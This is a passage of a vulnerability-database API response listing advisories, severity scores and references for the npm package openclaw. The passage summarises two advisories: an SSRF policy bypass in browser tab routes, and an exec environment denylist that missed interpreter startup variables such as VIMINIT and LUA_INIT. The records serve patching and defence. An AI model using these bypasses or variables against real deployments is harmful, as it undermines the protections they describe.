                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-41386",
                "GHSA-gg9v-mgcp-v6m7"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zpb1-e3g9-vkbh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89719?format=api",
            "vulnerability_id": "VCID-zpte-tgt5-wqcm",
            "summary": "OpenClaw: Browser tabs action select and close routes bypassed SSRF policy\n## Summary\n\nThe browser tabs action `select` and `close` routes bypassed the SSRF policy.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe `select` and `close` branches of the browser `/tabs/action` route could operate on targets without enforcing the configured browser SSRF policy, weakening tab-level navigation protections.\n\n## Technical Details\n\nThe fix enforces the browser SSRF policy in the `select` and `close` tab-action branches.\n\n## Fix\n\nThe issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `48c0347921b7e9438af0312968fc360ca88023f3`\n- PR: #63332\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42439",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09559",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11153",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11187",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42439"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63332",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63332"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42439",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42439"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rj2p-j66c-mgqh",
                    "reference_id": "GHSA-rj2p-j66c-mgqh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rj2p-j66c-mgqh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-42439",
                "GHSA-rj2p-j66c-mgqh"
            ],
            "risk_score": 3.9,
            "exploitability": "0.5",
            "weighted_severity": "7.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zpte-tgt5-wqcm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89586?format=api",
            "vulnerability_id": "VCID-zu4s-jnn3-1kd8",
            "summary": "OpenClaw: Exec environment denylist missed high-risk interpreter startup variables\n## Summary\n\nExec environment denylist missed high-risk interpreter startup variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior.\n\n## Technical Details\n\nThe fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.\n\n## Fix\n\nThe issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d126fc62343a7b6895351f96e4e1474bc358140`\n- PR: #63277\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43584",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30608",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30575",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.33672",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43584"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
